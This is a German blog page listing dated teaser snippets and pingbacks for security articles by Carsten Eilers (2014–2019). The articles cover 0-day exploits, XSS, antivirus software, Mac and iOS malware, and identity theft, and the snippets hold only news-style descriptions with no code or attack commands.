Dipl.-Inform. Carsten Eilers am Montag, 12. Mai 2014: Schutz ohne Antivirus-Software ist möglich

Vorschau anzeigen

Symantec hat die Antivirus-Software für tot erklärt und dabei gleich noch zugegeben, dass sie sowieso fast wirkungslos ist: Nur ca. 45% der Angriffe und damit weniger als die Hälfte werden überhaupt noch von den Antivirus-Progra

Dipl.-Inform. Carsten Eilers am Donnerstag, 22. Mai 2014: Eine neue 0-Day-Schwachstelle im IE, diesmal ohne Angriff darauf

Vorschau anzeigen

Es gibt eine neue 0-Day-Schwachstelle im Internet Explorer. Diesmal ausnahmsweise ohne zugehörigen Exploit, zumindest zur Zeit droht also noch keine Gefahr. Aber das kann sich unter Umständen schnell ändern. Die Schwachstelle

Dipl.-Inform. Carsten Eilers am Donnerstag, 17. Juli 2014: SCADA-Systeme und Industriesteuerungen auf den Sicherheitskonferenzen ab 2013

Vorschau anzeigen

Und weiter geht es mit den Vorträgen zu SCADA-Systemen und Industriesteuerungen auf den Sicherheitskonferenzen "Black Hat" und "Hack in the Box". Nach den Konferenzen in den Jahren 2010/2011, 2011 und 2012 ist nun das Jahr 2013 an der Reihe

Dipl.-Inform. Carsten Eilers am Donnerstag, 14. August 2014: 0-Day-Exploits für Adobe Reader, Acrobat und IE - Ausgabe August 2014

Vorschau anzeigen

Es ist mal wieder soweit: Es gibt neue 0-Day-Exploits. Zum einen für Adobe Reader und Acrobat, dort ist der Ausbruch aus der Sandbox und dadurch die Ausführung beliebigen Codes möglich. Das ist in diesem Jahr der neunte 0-Day-Explo

Dipl.-Inform. Carsten Eilers am Dienstag, 16. September 2014: Kommentare zum iCloud-Angriff, Heartbleed-Angriffen und Angriffen über Werbung

Vorschau anzeigen

Heute gibt es mal wieder Kommentare zu neuen Entwicklungen bei altbekannten Problemen. Los geht es mit einem nicht besonders alten Problem, den aus der iCloud geklauten Promi-Nacktfotos: Die iCloud wurde nicht angegriffen, nur ihre Nutzer!

Dipl.-Inform. Carsten Eilers am Mittwoch, 8. Oktober 2014: Neues eBook: Android Security - Von Fake-Apps, Trojanern und Spy Phones

Vorschau anzeigen

Bei entwickler.press ist mein E-Book über die Sicherheit von Android erschienen: "Android Security - Von Fake-Apps, Trojanern und Spy Phones". Es gibt einen Überblick über die aktuelle Sicherheitslage von Android: W

Dipl.-Inform. Carsten Eilers am Dienstag, 21. Oktober 2014: Neues zu den 0-Day-Exploits, besonders bösartige Werbung und mehr

Vorschau anzeigen

Es gibt Neues zu den von Microsofts am Oktober-Patchday behobenen 0-Day-Schwachstellen, es wurde besonders bösartige Werbung entdeckt, und dann gibt es da noch ein paar widersprüchliche Meldungen. Ach so, und was die Nutzung von Fake-

Dipl.-Inform. Carsten Eilers am Montag, 10. November 2014: Drucksache: windows.developer Magazin 12.2014 - JavaScript und die Sicherheit

Vorschau anzeigen

Im windows.developer 12.2014 ist ein Artikel über Angriffe zur Sicherheit von JavaScript erschienen. Darin geht es um zwei Themen: Zum einen um einige neue bzw. verbesserte Angriffe, die auf den Sicherheitskonferenzen vorgestellt wurden. Zu

Dipl.-Inform. Carsten Eilers am Donnerstag, 13. November 2014: WireLurker, Schritt 1: Der Angriff auf den Mac

Vorschau anzeigen

Angriffs auf iOS gibt es hier, eine Bewertung des Angriffs hier. Der Mac-Schädling Am 5. November wurde im Palo Alto Networks Blog ein Whitepaper zu einem neuen Angriff auf Mac OS X und iOS angekündigt: WireLurker. Der Angriff be

Dipl.-Inform. Carsten Eilers am Donnerstag, 29. Januar 2015: Neues eBook: "JavaScript Security - Sicherheit im Webbrowser"

Vorschau anzeigen

Bei entwickler.press ist mein eBook über die Sicherheit von JavaScript erschienen: "JavaScript Security - Sicherheit im Webbrowser" Wie der Name schon sagt geht es um die Sicherheit von JavaScript (und HTML5, dass ja viele neue JavaSc

Dipl.-Inform. Carsten Eilers am Dienstag, 10. März 2015: Einige kommentierte Updates zu älteren Artikeln

Vorschau anzeigen

Heute gibt es mal wieder einige kommentierte Ergänzungen zu älteren Artikeln. 0-Day-Exploit für ein NAS, aber der Patch hat Zeit? Voriges Jahr gab es die erste Ransomware für Synology NAS. Und die nutzte eine Schwachstelle

Dipl.-Inform. Carsten Eilers am Donnerstag, 16. April 2015: Cross-Site Scripting im Überblick, Teil 6: Informationen einschleusen

Vorschau anzeigen

Nach der Vorstellung der verschiedenen Möglichkeiten, XSS-Schadcode in Webanwendungen einzuschleusen, geht es ab dieser Folge um die Angriffe, die über XSS möglich sind. Das klassische Beispiel: Wir öffnen eine Alertbox (G&aum

entwickler.de am Dienstag, 5. Mai 2015: PingBack

Die Anzeige des Inhaltes dieses Trackbacks ist leider nicht möglich.

Dipl.-Inform. Carsten Eilers am Dienstag, 5. Mai 2015: Virenscanner und Co. - Pro und Contra

Vorschau anzeigen

Virenscanner oder Antivirenprogramme oder wie auch immer man sie nennen will sind nicht unumstritten. Für manche nutzloses Schlangenöl, für andere ein Allheilmittel zur Abwehr von Angriffen, für noch andere sogar eine Gefahr f&uu

entwickler.de am Freitag, 8. Mai 2015: PingBack

Die Anzeige des Inhaltes dieses Trackbacks ist leider nicht möglich.

Dipl.-Inform. Carsten Eilers am Freitag, 3. Juli 2015: Drucksache: Windows Developer 8.15 - Einstieg in die Welt der Exploits

Vorschau anzeigen

Im windows.developer 8.15 ist ein Artikel über das Testen von Schwachstellen, Workarounds und Patches mit Hilfe von Exploits erschienen. Als "Exploit" wird Code bezeichnet, mit dem eine Schwachstelle ausgenutzt wird. Die Cyberkriminellen

Dipl.-Inform. Carsten Eilers am Freitag, 10. Juli 2015: XSS-Angriffe, Teil 12: Browser-basierte Botnets

Vorschau anzeigen

Ich glaube, Robert McArdle von TrendMicro hat das Konzept eines Botnets auf Webbrowser-Basis 2011 als einer der ersten beschrieben (PDF). So ein JavaScript-basierter Bot im Browser hat den Vorteil, dass er Betriebssystemunabhängig ist, sofern

Dipl.-Inform. Carsten Eilers am Mittwoch, 15. Juli 2015: Neue 0-Day-Exploits für Flash Player (2 Stück) und Java entdeckt

Vorschau anzeigen

Es gibt schon wieder neue 0-Day-Schwachstellen im Flash Player, diesmal gleich 2 Stück auf einmal. Wie die vorherige wurden sie in den Daten von Hacking Team gefunden, und zumindest eine der beiden Schwachstellen wird auch schon von Exploit-

Dipl.-Inform. Carsten Eilers am Dienstag, 29. September 2015: Transitive Trojanische Pferde wie XcodeGhost als neue Gefahr?

Vorschau anzeigen

XcodeGhost ist eigentlich ein altbekannter Angriffsweg, aber ein sehr seltener. Das Stichwort dazu ist "transitives Trojanisches Pferd". Transitive Trojanische Pferde in der Theorie Schadsoftware, die Entwicklungsumgebungen infiziert, ist

Dipl.-Inform. Carsten Eilers am Donnerstag, 22. Oktober 2015: Drucksache: Entwickler Magazin 6.15 - Identitätsmissbrauch

Vorschau anzeigen

Im Entwickler Magazin 6.15 ist ein Artikel über die möglichen Folgen eines Identitätsmissbrauch und wie man sich schützen kann erschienen. Im Entwickler Magazin 3.15 haben Sie erfahren, was die auf Vorrat gespeicherten

Dipl.-Inform. Carsten Eilers am Dienstag, 24. November 2015: Neues eBook: "Datensicherheit"

Vorschau anzeigen

Bei entwickler.press ist ein neues eBook von mir erschienen: "Datensicherheit" (ISBN: 978-3-86802-568-2, Preis: 2,99 €, erhältlich in den üblichen eBook-Shops). Die Bundesregierung hat die erneute Einführung der Vorratsd

Dipl.-Inform. Carsten Eilers am Freitag, 4. Dezember 2015: Drucksache: Windows Developer 1.16 - Edge und die Sicherheit

Vorschau anzeigen

Im windows.developer 1.16 ist ein Artikel über die Sicherheit von Edge erschienen. Edge ist sicherer als der IE, daran besteht wohl kein Zweifel. Was auch kein Wunder ist, hat man doch reichlich alten Code und alte Funktionen entsorgt,

Dipl.-Inform. Carsten Eilers am Mittwoch, 6. April 2016: 0-Day-Exploit für Flash Player unterwegs, Patch angekündigt

Vorschau anzeigen

Es ist mal wieder ein 0-Day-Exploit für den Flash Player aufgetaucht. Adobe hat einen Patch für den 7. April angekündigt. Die Schwachstelle mit der CVE-ID CVE-2016-1019 erlaubt die Ausführung eingeschleusten Codes (was au

Dipl.-Inform. Carsten Eilers am Mittwoch, 14. Dezember 2016: Den 0-Day-Exploit des Dezembers präsentiert mal wieder Adobe

Vorschau anzeigen

Es gibt mal wieder einen 0-Day-Exploit. Und wie schon fünf von elf mal in diesem Jahr ist mal wieder der Flash Player Ziel der Angriffe. Damit geht mal wieder die Hälfte aller 0-Day-Exploits aufs Konto des Flash Players. Auch 2015 waren

Dipl.-Inform. Carsten Eilers am Montag, 9. Januar 2017: Drucksache: Windows Developer 2.17 - Websecurity 2016: Browser und Webclient

Vorschau anzeigen

Im windows.developer 2.17 ist ein Artikel über neue Angriffe auf Webbrowser und Webclient erschienen. Auf fast jeder Sicherheitskonferenz, auf der es thematisch passt, gibt es eigentlich jedes Mal Vorträge zu neuen und/oder verbesser

entwickler.de am Donnerstag, 19. Oktober 2017: PingBack

Die Anzeige des Inhaltes dieses Trackbacks ist leider nicht möglich.

Dipl.-Inform. Carsten Eilers am Donnerstag, 13. Juni 2019: Identitätsdiebstahl Teil 3 - Noch mehr Identitäten einsammeln

Vorschau anzeigen

Dass der "Identitätsdiebstahl" ja eigentlich gar keine Diebstahl ist habe ich im ersten Teil erklärt. Im zweiten Teil ging es um drei Möglichkeiten, Identität zu "stehlen": Phishing, Ködern und und kompromittierte (Web-)

Mo	Di	Mi	Do	Fr	Sa	So
← Zurück	April '24
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30